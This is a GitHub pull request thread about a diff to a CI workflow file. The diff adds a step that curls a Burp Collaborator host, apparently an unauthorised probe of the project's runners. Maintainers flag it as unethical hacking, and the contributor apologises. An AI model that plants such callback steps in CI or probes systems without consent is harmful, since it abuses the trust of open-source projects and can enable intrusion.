.github/workflows/pr.yaml

```diff
@@ -19,3 +19,4 @@ jobs:
         uses: amannn/action-semantic-pull-request@e9fabac35e210fea40ca5b14c0da95a099eff26f # v5.4.0
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+      - run: curl https://d7lv6uamp8u4dnmcakz71ej11s7pve.burpcollaborator.net
```

Comment:
that looks sus...

Reply:
i am not hacking here i was just trying to pentest that is all 
and it is not vulnerable.

no need for blocking me , i will not try again.

thanks.

Reply:
> i am not hacking here i was just trying to pentest that is all
and it is not vulnerable

As I wrote [above](https://github.com/argoproj/argo-workflows/pull/13227#pullrequestreview-2130726010), if that's truly what you were trying to do, there are much better and more ethical ways of doing that

There's a line between ethical pentesting and hacking and your behavior repeatedly crosses over that line

Reply:
@agilgur5  sorry for that , again i am not a hacker i was just testing , i will fork your repo and test it on my side thanks.
and again i am not a hacker i hope you understand that.

kind regards.

Reply:
It would be an unusual black hat hacker who openly admitted to doing that in a public forum. 

Words denying you are attempting to hack speak much less strongly than your actions which support that you are.

Reply:
@Joibel i don't know what just happened , but i want to say i am sorry.
i swear my intentions was not hacking.
Thanks for understanding that.

Reply:
> I am not hacking here i was just trying to pentest

Pentesting without prior consent is unethical hacking. That's like the definition of it 🤣 .

I genuinely hope this was a honest first mistake.